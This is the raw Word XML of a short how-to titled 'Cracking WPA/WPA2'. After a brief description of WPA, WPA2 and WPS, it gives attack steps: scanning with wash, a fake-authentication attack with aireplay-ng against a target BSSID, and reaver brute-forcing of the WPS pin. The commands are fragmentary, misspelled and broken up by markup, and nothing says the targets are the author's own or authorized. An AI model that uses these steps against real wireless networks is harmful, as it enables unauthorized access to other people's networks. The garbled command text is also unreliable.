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77" w:rsidRPr="007D699A" w:rsidRDefault="006C14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699A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Cracking WPA/WPA2:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007D699A" w:rsidRPr="007D699A" w:rsidRDefault="007D699A" w:rsidP="007D699A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WPA (Wi-Fi Protected Access) and WPA2 are wireless security protocols designed to protect Wi-Fi networks from unauthorized access and data breaches. They were developed as improvements over the older and less secure WEP (Wired Equivalent Privacy) protocol. Here's some information about WPA and WPA2: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699A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Wps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is a feature that can be used with both WPA and WPA2, and it enables clients to connect without a password.</w:t>
      </w:r>
      <w:r w:rsidR="00B53EE7" w:rsidRPr="007D699A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> This is how to crack WPA/WPA2.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• An eight-digit </w:t>
      </w:r>
      <w:r w:rsidR="00B53EE7" w:rsidRPr="007D699A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>pin is used for authentication.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The eight-digit pin is minuscule. We are able to use every pin that is available.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D699A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Execute the subsequent</w:t>
      </w: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wlan0—interface wash</w:t>
      </w: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You will get name of network copy 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bssid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and do fake authentication attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B53EE7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</w:p>
    <w:p w:rsidR="00832788" w:rsidRPr="007D699A" w:rsidRDefault="00B53EE7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Run the following now.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airply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>-ng -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fakeauth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30 -a [target mac] -h [ado</w:t>
      </w:r>
      <w:r w:rsidR="00B53EE7" w:rsidRPr="007D699A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>pter mac in monitor mode] wifi0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 xml:space="preserve">Run this </w:t>
      </w:r>
      <w:r w:rsidR="00B53EE7" w:rsidRPr="007D699A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>in split terminal concurrently.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  <w:r w:rsidRPr="007D699A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>• wlan0 – interface mode – channel 5 –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reaver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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007D699A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>bssid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D699A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>] –</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007D699A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>vvv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007D699A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – no-associate</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00832788" w:rsidRPr="007D699A" w:rsidRDefault="00832788" w:rsidP="00832788">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001F038A" w:rsidRPr="007D699A" w:rsidRDefault="001F038A" w:rsidP="001F03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038A" w:rsidRPr="007D699A" w:rsidSect="006C14BD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0BF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6EF4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BD"/>
    <w:rsid w:val="000A26FF"/>
    <w:rsid w:val="001F038A"/>
    <w:rsid w:val="0057188A"/>
    <w:rsid w:val="006C14BD"/>
    <w:rsid w:val="007D699A"/>
    <w:rsid w:val="00832788"/>
    <w:rsid w:val="00B4237C"/>
    <w:rsid w:val="00B5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D8733"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{18B28511-1992-4C8D-ADC9-58D70F45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790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Nayak</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Adithya Nayak</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-11-06T13:13:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-11-06T13:46:00Z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18023d53-0df9-48f4-83d2-6421fec03334</vt:lpwstr>
  </property>
</Properties>
</file>